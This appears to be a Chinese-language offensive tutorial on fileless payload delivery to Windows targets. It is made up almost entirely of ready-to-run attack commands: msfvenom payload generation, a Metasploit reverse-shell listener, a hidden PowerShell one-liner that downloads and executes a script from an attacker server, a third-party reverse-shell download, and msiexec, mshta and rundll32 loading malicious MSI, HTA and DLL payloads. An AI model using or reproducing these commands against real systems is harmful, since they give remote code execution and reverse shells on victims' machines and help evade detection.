Powershell

Step 1：使用Msfvenom生成一个攻击载荷

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=4444 -f psh-reflection >shell.ps1

Step 2：在 msf 中启动监听

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.174.129
LHOST => 192.168.174.129
set LPORT 4444
set ExitOnSession false
exploit -j -z

Step 3：使用 python 启动一个简易的 Web 服务器用于托管 shell.ps1

Step 4：之后在目标主机中使用 powershell 执行以下命令，实现无文件落地攻击

powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.174.129:1234/shell.ps1'))"

或者直接 goby powershell 上线

powershell IEX (New-Object Net.WebClient).DownloadString('http://gobygo.net/ps/rs.ps1');rs -H 172.28.100.18 -P 4444

msiexec

msiexec.exe 属于系统进程，是 Windows Installer 的一部分，用于安装Windows Installer 安装包(MSI)，对系统的正常运行非常重要，一般在运行Microsoft Update 安装更新或安装部分软件的时候出现，占用内存比较大，我们亦可以使用其作为无文件落地的媒介，下面举例说明：

Step 1：使用 Msfvenom 构造一个恶意的 msi 程序

msfvenom -p windows/exec CMD="calc" -f msi > evil.msi

Step 2：使用 python 开启一个简易的 web 服务器用于托管 msi 载荷

Step 3：在目标主机中执行以下命令实现无文件落地执行载荷

msiexec /q /i http://192.168.174.129:1234/evil.msi

mshta

mshta.exe 是微软 Windows 操作系统相关程序，英文全称 Microsoft HTML Application，可翻译为微软超文本标记语言应用，用于执行 .HTA 文件，我们可以在本地构建 hta 文件，之后通过目标主机的mshta来远程下载并执行，从而实现无文件落地攻击，下面是具体的步骤：

Step: 使用 Msfvenom 构造一个恶意的 hta 文件

msfvenom -p windows/exec CMD="calc" -f hta-psh > evil.hta

Step 2: 使用 python 开启一个简易的 web 服务器用于托管 hta 载荷

Step 3: 在目标主机中执行以下命令实现无文件落地执行载荷

mshta.exe http://172.24.143.102:8888/evil.hta

rundll

严格意义上讲这个不算无文件落地

Rundll32.exe，即”执行32位的DLL文件”，它是一个 Microsoft 二进制文件，其主要功能是以命令行的方式调用动态链接程序库。

Rundll64.exe 它的意思是”执行64位的DLL文件”，这两个是病毒软件制作者的最爱，也是在以往病毒分析报告中出现最多的应用媒介。

Rundll32.exe 的使用方法如下：

Rundll32.exe DLLname,Functionname Arguments

参数说明：

DLLname：需要执行的DLL文件名
Functionname：需要执行的DLL文件的具体引出函数
Arguments：函数的具体参数

Step 1: 生成能够执行命令的 dll

msfvenom -p windows/exec CMD="calc" -f dll > evil.dll

Step 2: 启动 Web 服务器

将 dll 下载到本地

Step 3:

rundll32 evil.dll,any